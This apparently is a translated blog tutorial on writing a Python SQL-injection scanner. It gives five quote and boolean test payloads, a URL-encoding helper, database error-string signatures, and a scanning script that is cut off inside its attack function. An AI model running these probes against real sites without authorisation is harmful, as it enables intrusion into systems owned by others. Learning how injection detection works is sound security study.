The previous post covered crawling pages from a seed URL and extracting the valid URLs found on them.
This post goes a step further: once the URLs are collected, each one is tested for SQL injection.
SQL injection detection approach:
Crawl the site and collect URLs that carry parameters, e.g. http://www.target.com/show.asp?id=666
Then put each URL through five checks, appending:
1. a single quote (')
2. And 1=1
3. And 1=2
4. And '1'='1
5. And '1'='2
(the injection payloads must be URL-encoded before they are sent)
By comparing the status codes, the response bodies, and the bodies of each pair of requests against one another, we can decide whether the parameter is an injection point.
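The five payload variants above can be generated and URL-encoded in one place. A minimal Python 3 sketch (the suffix list mirrors steps 1-5; the function name and everything else here are illustrative, not part of the script below):

```python
from urllib.parse import quote

def build_test_urls(url):
    """Return the five injection-test URLs described above, URL-encoded."""
    suffixes = [
        "'",              # 1. bare single quote
        " And 1=1",       # 2. always-true numeric condition
        " And 1=2",       # 3. always-false numeric condition
        " And '1'='1",    # 4. always-true string condition
        " And '1'='2",    # 5. always-false string condition
    ]
    # safe='' forces spaces, quotes and '=' to be percent-encoded
    return [url + quote(s, safe='') for s in suffixes]

for u in build_test_urls("http://www.target.com/show.asp?id=666"):
    print(u)
```

The encoded suffixes (e.g. `%27` for the single quote, `%20And%201%3D1` for `And 1=1`) are appended as-is, so the server sees the payload exactly once decoded.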
# -*- coding: utf-8 -*-
# __author__ = lzyq
import re
import requests
import time
from bs4 import BeautifulSoup as asp
import random
import os
print '''
Author: 浪子燕青 (LangZiYanQing)
Author QQ: 982722261
'''
time.sleep(8)  # pause so the banner can be read
headeraa = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)',}
zhaohan = open('mINJlogo.txt','a+')
zhaohan8 = open('INJ.txt','a+')
# Common database error strings, used to spot DB errors in the response body
huixian1 = "is not a valid MySQL result resource"
huixian2 = "ODBC SQL Server Driver"
huixian3 = "Warning: ociexecute"
huixian4 = "Warning: pg_query() [function.pg-query]"
huixian5 = "You have an error in your SQL syntax"
huixian6 = "Database Engine"
huixian7 = "Undefined variable"
huixian8 = "on line"
hansb = open('urllist.txt','r')
hanssb = hansb.readlines()
hansb.close()
ttzh = str(time.ctime())
# If you have not collected any URLs yet, see the previous post on crawling them
zhaohan.write('-------------------------------------------------LOGO-------------------------------------------------' + '\n')
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.92 Safari/537.1 LBBROWSER'}
def attack(urlx):
    payload0 = urlx + "'"
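The listing cuts off inside attack(). Based on the detection idea stated at the top (five payloads, then compare status codes and bodies, plus error-string matching), the decision step might look roughly like the sketch below. This is a hedged Python 3 reconstruction, not the author's original code; it covers steps 1-3 (steps 4-5 work the same way), and it is written as a pure function over (status_code, body) pairs so it can be tested without a live target:

```python
# Error fragments that suggest the backend database raised an error
ERROR_SIGNS = [
    "is not a valid MySQL result resource",
    "ODBC SQL Server Driver",
    "You have an error in your SQL syntax",
]

def judge(base, quoted, truthy, falsy):
    """Each argument is a (status_code, body) pair for one request:
    base   -> the untouched URL
    quoted -> URL + '         (step 1)
    truthy -> URL + And 1=1   (step 2)
    falsy  -> URL + And 1=2   (step 3)
    Returns True when the responses follow the classic injection pattern."""
    # A database error string in the quoted response is a strong signal
    if any(sign in quoted[1] for sign in ERROR_SIGNS):
        return True
    # And 1=1 should look like the original page; And 1=2 should not
    if truthy == base and falsy[1] != base[1]:
        return True
    return False
```

In the full script, attack() would fetch each payload URL (e.g. with requests.get), feed the (status, body) pairs into a check like this, and log hits to the INJ.txt file opened earlier.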